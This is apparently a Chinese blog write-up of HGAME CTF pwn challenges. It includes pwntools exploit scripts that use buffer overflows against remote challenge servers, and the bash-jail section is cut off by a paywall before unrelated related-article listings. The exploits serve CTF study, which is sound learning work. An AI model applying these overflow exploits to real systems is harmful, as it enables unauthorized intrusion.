HGAME 2017 or 2018 PWN levels

最新推荐文章于 2024-02-17 20:29:50 发布
原创 最新推荐文章于 2024-02-17 20:29:50 发布 · 1k 阅读 · 0
标签
#HGAME #PWN levels
本文详细介绍了HGAME 2017或2018年PWN类挑战的解决过程,包括各种缓冲区溢出、格式字符串漏洞、堆溢出等技术的利用,涉及ida分析、exp编写等内容,适合逆向工程和安全研究爱好者学习。

这个算是做之前的复现吧,感谢Veritas501

WEEK1

1.flag server

拖进IDA看一下

流程倒着看,要有flag-----v8=1-----v5=v6-----s1=admin,我们可以把s1覆盖掉-----username长度不能大于63,不能等于0-----之后还要猜出随机数v6,看一下怎么覆盖

这些变量都在一起,美滋滋

exp

from pwn import *

cn=remote('111.230.149.72',30001)

cn.sendline('xiaoyuyu')
cn.recvuntil("your username length: ")
cn.sendline('-1')
payload='a'*(0x50-0x10)+p64(1)
cn.recvuntil("whats your username?")
cn.sendline(payload)
cn.interactive()

2.guess number

scanf直接溢出就好了,如下

a1和nptr的偏移量 0x10C+0x8

exp

from pwn import *

cn=remote('111.230.149.72',30002)

cn.sendline("xiaoyuyu")

payload='0'*(0x10C+0x8)+p64(0)

cn.send(payload)

cn.interactive()

3.zazahui

这次有两个文件,古天乐和正常的

拖进IDA

里面两个函数,第一个是个file open之类的,读取flag和ad的值,第二个函数如下

感觉没啥溢出的地方,跟进函数sub_8048634

基本可以猜测出就是个read函数,范围是188,我们可以看到s1的范围从0xC0到0x10,只有176,那么这个函数就溢出了,把读取的地址改到flag的地址,同时有一点要注意,要把v3变成100,不然flag读不出来

exp

#coding=utf8
from pwn import *
context.log_level = 'debug'
context.terminal = ['gnome-terminal','-x','bash','-c']

local = 0

if local:
        cn = process('./zazahui')
        bin = ELF('./zazahui')
        #libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
        libc = ELF('/lib/i386-linux-gnu/libc-2.23.so')
else:
        cn = remote('111.230.149.72',30003)
        bin = ELF('./zazahui')
        libc = ELF('./libc32.so')


def z(a=''):
        gdb.attach(cn,a)
        if a == '':
                raw_input()

cn.sendline("xiaoyuyu")
flag_addr=0x0804A060
payload='a'*176+p32(flag_addr)+p32(100)
cn.recvuntil('> ')
cn.sendline(payload)

cn.interactive()
#local x64: main_arena = 0x3c4b20
#local x86: main_arena = 0x1b2780

WEEK2

4.bash jail

可还行,拖进IDA看一下

我第一反应是把Lineptr改成/bin/sh

分析一下里面的函数,400706里面的意思是如果开头输入的是(a,b,c,f,h,g,i,l,n,s,t,*)会输出hacker!! go away~~ QAQ

那我们输入数字试一下,情况如下

最低0.47元/天 解锁文章
2022年HGAME中REVERSE的猫头鹰选择在白天走迷宫
沐一 · 林 的博客
04-09 754
2022年HGAME中REVERSE的猫头鹰选择在白天走迷宫 下载附件: . . 照例扔入 exeinfope 中查看信息: . . 先运行一下看主要回显信息: . . 64 位无壳,照例扔入 IDA64 中查看伪代码,有 main 函数看 main 函数: . . 把 byte_404020 数组内容提取出来整理成 64*64 矩阵即可:(下面是学到的整理代码) map=[0x20,0x20,0x23,0x23,0x23,0x23,0x23,0x23,0x23,0x23,0x23,0x23,0x
2022年HGAME中REVERSE的Flag Checker
沐一 · 林 的博客
04-04 1125
2022年HGAME中REVERSE的Flag Checker 照例下载附件: . . APK 文件,运行不了,照例扔入 JEB 中查看代码: . . 既然是 RC4 加密,那么直接搬上解密代码,结果发现解码错误: . . 那就修改编码为 Unicode-escape 编码,正确代码如下:(相关编码细节可以查看另一篇博客) # -*- coding: utf-8 -*- import base64 def get_message(): print("输入你的信息: ") s=input() r
[HGAME 2022 week1]好康的流量
atm7758258的博客
10-06 1436
[HGAME 2022 week1]好康的流量题目分析,基于流量分析,图片隐写,LSB最低有效位
我对HGAME的看法(GalGame)
大师的资源
02-15 1万+
堕落了,居然下载18禁的GalGame顺便谈谈我对 HGAME的看法HGAME,我也局限于studio e go的游戏更准确地说是18禁的GalGame(美少女游戏)看看网上:切随便找个 GAL 游戏美女都多的要不成 GAL全是H的 日本游戏没H的少死了 在日本大家都玩PS PC游戏市场都被H的占领了 所以PC游戏就是HGAME 想玩HGAME 就说嘛(http://zhidao.baid
hgame 2024 week1
yzzob的博客
02-17 2573
1.请从vidar.club访问这个页面>>Referer: vidar.club2.请通过Mozilla/5.0 (Vidar;VidarOS x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0访问此页面3.请从本地访问这个页面>>
HGAME 2024 WEEK1 misc
永不落的梦想
02-05 1059
5分钟左右,点击停止可生成无加密的压缩包 attachment_decrypted.zip,打开其中photo.txt文件,发现是图片的base64编码,将其转换为图片,获得flag;下载附件,有一张图片和一个压缩包,压缩包中的图片与压缩包外的图片是一致的,结合题目名,猜测是明文攻击,将图片压缩与压缩包一起放入ARCHPR中进行明文攻击即可;下载附件secret.jpg,根据提示发现是steghide隐写,弱密码123456;结合题目名与描述,字符串为密文,lsb中的为希尔密码的密钥,解密即可;
HGame 2023 Week1 部分Writeup
vvbbnn00的专栏
01-17 3193
第一周的大部分题目难度较低,不过也存在一部分难题,解这些题目的过程也是一个很好的学习机会(虽然最后还是没解出来)下面是我的题解。
本世纪最经典好文---新系统下经典老游戏[中文HGAME]重玩全攻略(感谢作者)
lanji1988的专栏
04-10 3万+
送给所有爱玩游戏的老鸟们 老游戏中有大量经典作品,其中中文的HGAME更是经典中的经典! ◆ 告别的年代 失色的回忆?——新系统下经典老游戏重玩全攻略 ◆  “新”与“老”当然是相对的,不过在开篇之前有必要确定我们的讨论范畴,这里的“老”是指为Win98之前的操作系统,包括DOS和Win32/95,而新系统则是指Win98/2000/XP。毫无疑问,有很多老游戏都很值得我们来重温,但重
下载和中文攻略之更胜黎明前的琉璃色 夜明け前より瑠璃色な
大师的资源
07-25 2万+
  夜明前的琉璃色=更胜黎明前的琉璃色=Brighter than Dawning Blue=夜明け前より瑠璃色な 故事讲述的是在很久很久以前,人们登上月球,在月球上建立了“斯菲阿国(スフィア国)”。之后人们来往于月球与地球之间,但是因为数百年前的一次战争,一般身份的市民已经不能来往于两地了。这个故事的舞台就在月球与地球的唯一连接窗口“满弦崎中央联络港”所在的满弦崎中央联络港市。
Galgames Hgames下载中心,无毒
weixin_33816611的博客
06-12 1万+
大型Hgames下载网站,男人懂的! http://www.galgame.net/bbs/?fromuid=330630 转载于:https://blog.51cto.com/3218478/586402
[CTF]Hgame2024-PWN部分wp
2301_79880752的博客
02-11 2512
签到题,直接nc得到flag。
下载和攻略补遗之人偶遗迹 ひとがたルイン
大师的资源
08-04 1万+
ruins-人偶遗迹 汉化第一档发布,无聊的ego饭可以下去玩玩……  专题: 本博客恋爱类和galgame(Hgame)游戏资源链接汇总 http://pickup.mofile.com/2901583673956083       或登录Mofile,使用提取码 2901583673956083 提取 人偶遗迹 全CG 结局:塞卡线+迪阿娜+玛库琉姆 存档适合中文汉化版,日
HGame 2023 Week3 部分Writeup
vvbbnn00的专栏
01-30 1588
本周在迎新春,走亲戚(真的很忙),外加题目难度增加,笔者比较菜,因此只解出了寥寥几题,不过姑且也算是一些成就,故作此题解,希望能够对各位读者有些帮助。Week3 比赛地址:https://hgame.vidar.club/contest/4。
2022HGAME中REVERSE的creakme2
沐一 · 林 的博客
04-30 880
2022HGAME中REVERSE的creakme2 下载附件: . . 照例扔入 exeinfope 中查看信息: . . 照例扔入 IDA64 中查看伪代码,有 main 函数看 main 函数: . . F5 未生成的异常与回调函数处理: 但是常规的 XTEA 解密算法并不对,一开始怀疑题目错了,果然还是自己太菜了,出人意料的结果都是表明中间存在未分析的操作啊! (这里是除 0 异常和异常处理回调函数,虽然不知道那里限定了 loc_140001141 就是回调函数) . . 修改一下 XT
2022年HGAME中CRYPTO的Easy RSA
沐一 · 林 的博客
04-04 639
2022年HGAME中CRYPTO的Easy RSA 照例下载附件: . . 结合遍历列表中元祖,直接常规RSA解密即可 import libnum from Crypto.Util.number import long_to_bytes list1=[(12433, 149, 197, 104), (8147, 131, 167, 6633), (10687, 211, 197, 35594), (19681, 131, 211, 15710), (33577, 251, 211, 38798), (
2022年HGAME中REVERSE的easyasm
沐一 · 林 的博客
04-04 2068
2022年HGAME中REVERSE的easyasm . . 照例下载附件,是一个DOS文件: . . 根据题目中文含义,简单的 ASM 汇编,照例扔入 IDA 中查看反汇编: . . 没办法,只能理解汇编代码了,由于对段寄存器段偏移地址不太熟悉,所以栽了很多跟头: . . 其实爆破逻辑和那个段都没关系,但是由于我不理解对应哪个段,加上不熟悉没有 F5 ,所以我脚本逻辑一直写错,然后又没法验证,所以就一直揪着 si 的段想了很久: debug命令 意义 u 查看debug反汇编过
HGAME 2022 Writeup
末初 · mochu7
01-28 1万+
文章目录Level - Week1WEBMISC欢迎欢迎!热烈欢迎!这个压缩包有点麻烦好康的流量群青(其实是幽灵东京)CRYPTO 新人赛,就没有存题目附件了,简单的记录一下解题过程吧 Level - Week1 WEB MISC 欢迎欢迎!热烈欢迎! hgame{We1com3_t0_HG@ME_2O22} 这个压缩包有点麻烦 README.txt I don't know if it's a good idea to write down all the passwords. 将pa
经典作品推荐CLANNAD(含下载、汉化、周边和攻略,真正全语音)
大师的资源
08-30 8034
 天阙の枪神 18:33:41CLANNAD问一下谁有这个游戏种子啊我找了一天了也没找到天阙の枪神 18:33:52有的话发一下  CLANNAD介绍 官网:http://key.visualarts.gr.jp/product/clannad/ 我先说明白了,这是一款全年龄的名作,为了H情节来下载的请不要发表抱怨及相关的意见! 攻略汉化去汉化小组官方BBS
由一道bash jail题引出的琐事@_@
a_18067的博客
06-21 628
关键词:Terminal devices、shell、stdio 题目入口: (需要注册) root@kali:~# ssh level1@24.37.41.154 -p 1016 level1@24.37.41.154's password: RingZer0 Team Online CTF BASH Jail Level 1: Current user is uid=1000...
可爱的EGO所有中文游戏下载
热门推荐
大师的资源
06-29 4万+
Studio e.go!公司简介: Studio e.go!是日本一家开发游戏的公司,于1998年由原画师山本和枝创立,她曾为TGL公司的Farland Story系列担当人物设计。公司的吉祥物为一只名为“迪波”的胖麻雀,常在游戏中出现。2001年,该公司成立了名为BlueImpact的分公司,游戏的方向以BL为主。公司的一些作品透过台湾的信必优公司改为全年龄中文版。公司官方主页为:http://
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值